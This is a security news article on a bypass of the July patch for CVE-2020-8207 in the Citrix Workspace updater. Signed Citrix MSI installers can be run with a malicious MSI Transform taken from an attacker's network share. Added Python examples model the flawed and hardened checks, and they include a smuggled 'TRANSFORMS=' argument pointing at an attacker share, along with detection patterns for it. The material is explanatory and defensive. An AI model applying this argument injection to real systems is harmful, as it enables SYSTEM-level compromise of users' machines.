Windows MSI files provide an opening for attackers even though the bug was originally patched in July.
A Citrix Workspace vulnerability that was fixed in July has been found to have a secondary attack vector, which would allow cybercriminals to elevate privileges and remotely execute arbitrary commands under the SYSTEM account.
The bug (CVE-2020-8207) exists in the automatic update service of the Citrix Workspace app for Windows. It could allow local privilege escalation as well as remote compromise of a computer running the app when Windows file sharing (SMB) is enabled, according to the Citrix advisory.
The bug, although mostly fixed over the summer, was recently found to still allow attackers to abuse Citrix-signed MSI installers, according to Pen Test Partners (MSI is the filename extension of Windows Installer packages). This turns the bug into a remote command-line injection vulnerability.
The update service originally relied on a weak file hash within a JSON payload to determine whether an update should proceed or not, allowing attackers to download their own code by exploiting the weak hash. To address the issue, the latest update catalogs are now downloaded directly from the Citrix update servers, and the service “cross-references the hashes with the file that is requested for installation from the UpdateFilePath attribute,” wrote researchers at Pen Test Partners in a Monday posting.
“If the update file is signed, valid and the hash of the update file matches one of the files within the manifest, the update file is executed to perform the update,” they explained.
However, the patch did not block remote connectivity, which would have reduced the attack surface.
“The catalog contains executables and MSI files for installation,” according to the company. “MSI files, however, cannot be executed in the same way as executable files, therefore the update service must handle these differently.”
In reviewing the installer-launch code, the researchers found that the application checks the extension of the file requested for update, and if it ends with .msi, it is assumed to be a Windows Installer file. Because the MSI file is checked for a valid signature and cross-referenced with the current catalog, attackers can’t directly install arbitrary MSI files.
Even though the MSI files are signed and hashed to prevent modification, one of the features supported by the Windows Installer is MSI Transforms (MST).
“As the name implies, MSI Transforms support altering or transforming the MSI database in some way prior to installation,” according to Pen Test Partners. “Domain administrators commonly use this feature to push out MSI files within Active Directory environments that do not always work in an unattended way when executed on their own. For instance, an MST could be created that will inject a product activation code prior to installing.”
To use an MST, users specify the path to the transform file on the msiexec command line (the TRANSFORMS property), which merges the main MSI file with the changes present in the MST file during the installation process.
Therein lies the bug: “Since we can control the arguments passed to msiexec, we can include the path to a malicious Transform but using an official, signed Citrix MSI that is present within the catalog file,” researchers explained.
Malicious Transforms can be created with an existing tool called Microsoft Orca, they added, or with a custom tool. Then, to exploit the vulnerability, attackers would place the legitimate MSI installer and the MST onto a network share ready for the victim machine.
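The following is an added example, not code from Pen Test Partners or Citrix, that models the two-stage check described above: the July patch verifies the installer's extension, signature and catalog hash but never inspects the arguments handed to msiexec, so a signed, catalogued MSI on an attacker's share can still be launched with a TRANSFORMS= property pointing at a malicious MST. The installer bytes, the SHA-256 catalog, the stand-in signature check, the cache directory and the hardened rules are all assumptions made for illustration; the real service's hash algorithm and Authenticode verification are not reproduced.

```python
import hashlib

# Constructed stand-in for a Citrix-signed installer and the catalog entry that lists it.
# Bytes and hash are made up for this example; SHA-256 is an assumed choice of hash.
SIGNED_MSI = b"MSI\x00 constructed stand-in for a signed CitrixWorkspaceApp.msi"
CATALOG = {"CitrixWorkspaceApp.msi": hashlib.sha256(SIGNED_MSI).hexdigest()}

# Hypothetical local cache the hardened check requires installers to be launched from.
LOCAL_CACHE = "C:\\ProgramData\\Citrix\\Updates\\"


def signature_valid(data: bytes) -> bool:
    """Stand-in for Authenticode verification: only the constructed blob counts as signed."""
    return data == SIGNED_MSI


def hash_in_catalog(data: bytes) -> bool:
    """Cross-reference the requested file's hash with the hashes in the catalog."""
    return hashlib.sha256(data).hexdigest() in CATALOG.values()


def patched_check(update_file_path: str, file_data: bytes, msiexec_args: list) -> bool:
    """Models the July-patch logic as the article describes it: extension, signature and
    catalog hash are verified, but msiexec_args is never looked at."""
    if not update_file_path.lower().endswith(".msi"):
        return False
    if not signature_valid(file_data):
        return False
    return hash_in_catalog(file_data)


def hardened_check(update_file_path: str, file_data: bytes, msiexec_args: list) -> bool:
    """Same file checks, plus two assumed rules: the installer must live in the local cache
    (no UNC paths), and no caller-supplied msiexec arguments are accepted, so a
    TRANSFORMS=... or PATCH=... property cannot be smuggled in."""
    if not patched_check(update_file_path, file_data, msiexec_args):
        return False
    if update_file_path.startswith("\\\\"):  # UNC path: a share the requester controls
        return False
    if not update_file_path.lower().startswith(LOCAL_CACHE.lower()):
        return False
    return len(msiexec_args) == 0


def build_msiexec_cmdline(update_file_path: str, msiexec_args: list) -> list:
    """The command line the service would hand to msiexec, so the injected property is visible."""
    return ["msiexec.exe", "/i", update_file_path, *msiexec_args, "/qn"]


if __name__ == "__main__":
    share_msi = "\\\\attacker\\share\\CitrixWorkspaceApp.msi"
    evil = ["TRANSFORMS=\\\\attacker\\share\\evil.mst"]
    print("patched accepts bypass:", patched_check(share_msi, SIGNED_MSI, evil))
    print("hardened accepts bypass:", hardened_check(share_msi, SIGNED_MSI, evil))
    print(" ".join(build_msiexec_cmdline(share_msi, evil)))
```

The point of the model is that the file-level checks are all satisfied by the bypass: the MSI really is the signed, catalogued Citrix installer. The only effective fixes are on the launch side, rejecting remote paths and any argument the service did not generate itself.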
“Both the local and remote privilege-escalation methods can only be exploited while an instance of CitrixReceiverUpdate.exe is running on the target host as before,” the researchers concluded. “I think the remote vector is easier to exploit this time around because you can place both MSI and MST files on a network share under the attacker’s control.”
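For defenders, the observable artifact is an msiexec launch whose TRANSFORMS property, or installer path, points at a network share. The detection below is an added example (not from the researchers or Citrix) run over constructed process-creation records in the shape of Sysmon Event ID 1 fields; the parent-process path for CitrixReceiverUpdate.exe and the assumption that the update service spawns msiexec as a child are illustrative, not taken from the article.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); none are real telemetry.
UPDATER = r"C:\Program Files (x86)\Citrix\ICA Client\Receiver\CitrixReceiverUpdate.exe"  # assumed path
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": UPDATER,
     "CommandLine": r'msiexec.exe /i "C:\ProgramData\Citrix\Updates\CitrixWorkspaceApp.msi" /qn'},
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": UPDATER,
     "CommandLine": r'msiexec.exe /i "\\attacker\share\CitrixWorkspaceApp.msi" TRANSFORMS=\\attacker\share\evil.mst /qn'},
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi TRANSFORMS=C:\Users\alice\Downloads\tool.mst"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe \\fileserver\docs\notes.txt"},
]

UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\[^\\\s"]+')          # \\host\share...
TRANSFORMS = re.compile(r'TRANSFORMS=(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def analyze(event: dict) -> list:
    """Return a list of findings for one process-creation record; empty means benign."""
    findings = []
    if not event["Image"].lower().endswith("\\msiexec.exe"):
        return findings  # only Windows Installer launches are of interest here
    cmd = event["CommandLine"]
    m = TRANSFORMS.search(cmd)
    if m:
        mst = m.group(1) or m.group(2)
        if mst.startswith("\\\\"):
            findings.append("transform loaded from UNC path: " + mst)
        else:
            findings.append("transform applied: " + mst)
    if UNC_PATH.search(cmd):
        findings.append("msiexec command line references a network share")
    # Assumed correlation: the Citrix updater spawning msiexec with a remote MST or MSI
    # matches the CVE-2020-8207 pattern described by Pen Test Partners.
    if findings and event["ParentImage"].lower().endswith("\\citrixreceiverupdate.exe"):
        findings.append("spawned by CitrixReceiverUpdate.exe (CVE-2020-8207 pattern)")
    return findings


def suspicious_events(events: list) -> list:
    """Filter to records that reference a UNC path from msiexec."""
    return [e for e in events if any("UNC" in f or "network share" in f for f in analyze(e))]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["CommandLine"], "->", analyze(e) or "clean")
```

A local transform applied by an interactive user (the third record) is common administrative behaviour and is reported only as context; the alert-worthy combination is the remote MST or MSI path, especially when the parent is the Citrix updater.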
Citrix Workspace for Windows users should update their apps to the latest version, which contains a revised patch.
Some parts of this article are sourced from:
threatpost.com